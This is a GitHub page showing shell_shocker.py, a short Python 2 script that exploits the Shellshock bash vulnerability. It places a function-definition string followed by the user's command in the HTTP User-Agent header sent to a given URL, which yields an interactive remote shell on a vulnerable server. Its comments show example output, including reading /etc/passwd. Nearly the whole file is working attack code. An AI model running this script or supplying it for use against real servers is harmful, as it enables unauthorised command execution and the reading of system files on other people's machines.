-
Notifications
You must be signed in to change notification settings - Fork 190
Expand file tree
/
Copy pathshell_shocker.py
More file actions
32 lines (26 loc) · 776 Bytes
/
shell_shocker.py
File metadata and controls
32 lines (26 loc) · 776 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python
# Successful Output:
# # python shell_shocker.py <VulnURL>
# [+] Attempting Shell_Shock - Make sure to type full path
# ~$ /bin/ls /
# bin
# boot
# dev
# etc
# ..
# ~$ /bin/cat /etc/passwd
import sys, urllib2
if len(sys.argv) != 2:
print "Usage: shell_shocker <URL>"
sys.exit(0)
URL=sys.argv[1]
print "[+] Attempting Shell_Shock - Make sure to type full path"
while True:
command=raw_input("~$ ")
opener=urllib2.build_opener()
opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
try:
response=opener.open(URL)
for line in response.readlines():
print line.strip()
except Exception as e: print e